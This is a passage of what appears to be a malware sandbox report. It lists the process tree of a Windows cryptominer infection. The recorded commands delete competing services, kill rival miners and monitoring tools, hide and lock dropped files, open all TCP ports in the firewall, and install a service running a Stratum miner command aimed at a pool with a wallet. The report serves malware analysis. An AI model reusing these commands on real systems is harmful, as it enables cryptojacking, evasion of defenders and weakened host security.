-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HostManger3⤵
-
C:\Windows\SysWOW64\sc.exesc delete HostManger2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop Hostserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Hostserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServiceMaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMaims3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims2⤵
-
C:\Windows\SysWOW64\net.exenet stop ServicesMain2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServicesMain3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop Famserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Famserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Famserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger2⤵
-
C:\Windows\SysWOW64\sc.exesc delete samserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop samserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop samserver3⤵
-
C:\Windows\SysWOW64\net.exenet stop WinNsaSrv2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinNsaSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WinNsaSrv2⤵
- Launches sc.exe
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start HostManger2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\hosts1.bat2⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\vmicvess\svchost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\fonts\help\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\temp\conhost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\debug\lsmose.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmose.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\services.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\svchost.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\hosts.bat2⤵
-
C:\Windows\SysWOW64\sc.exesc stop COMSysCts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WmSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete WmSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "RegCsv COMSysApp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RegCsv COMSysApp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop hasplms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete hasplms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop hasp1ms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete hasp1ms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter$3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter$3⤵
-
C:\Windows\SysWOW64\sc.exesc stop IPSECS3⤵
-
C:\Windows\SysWOW64\sc.exesc delete IPSECS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftFonts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft_Update3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft_Update3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "Help Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Help Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop vmicvess3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete vmicvess3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SSDPSRVS3⤵
-
C:\Windows\SysWOW64\sc.exesc delete SSDPSRVS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop superproservert3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete superproservert3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Bcdefg3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Bcdefg3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop ctfnom3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ctfnom3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop ClipBooks3⤵
-
C:\Windows\SysWOW64\net.exenet stop "MicrosoftFonts"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MicrosoftFonts"4⤵
-
C:\Windows\SysWOW64\net.exenet stop MicrosoftFonts3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MicrosoftFonts4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Framework"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Framework"4⤵
-
C:\Windows\SysWOW64\net.exenet stop Servicing3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Servicing4⤵
-
C:\Windows\SysWOW64\sc.exesc stop cefragsvc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete cefragsvc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft.NET_Framework_NGEN3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft.NET_Framework_NGEN3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop natiodnal3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete natiodnal3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop wbzxqk3⤵
-
C:\Windows\SysWOW64\sc.exesc delete wbzxqk3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop hidserv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete hidserv3⤵
-
C:\Windows\SysWOW64\sc.exesc stop NetASDlogon3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete NetASDlogon3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "BITS lsm"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "BITS lsm"3⤵
-
C:\Windows\SysWOW64\sc.exesc stop endpointrpc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete endpointrpc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "MYSQL Input Service Name"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop csrss3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MYSQL Input Service Name"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete csrss3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop gupdate3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete gupdate3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop gupdatem3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete gupdatem3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop wmiApSrvs3⤵
-
C:\Windows\SysWOW64\sc.exesc delete wmiApSrvs3⤵
-
C:\Windows\SysWOW64\sc.exesc stop snmpstorsrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete snmpstorsrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MicrosoftFonts"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Servicing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im runhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundllhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dlllhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsmsm.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\mysql.log /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsaus.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\srvany.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\splwow64.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im tasksche.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\tasksche.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\tasksche.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\help\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\help\www.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet start MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start MpsSvc4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=win3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=win assign=y3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\SysWOW64\find.exefind "5.1."3⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet stop RpcEptManger2⤵
-
C:\Windows\SysWOW64\sc.exesc delete FormManger2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop FormManger2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FormManger1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RpcEptManger1⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\lsass.exe"c:\windows\Fonts\lsass.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Hostserver3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
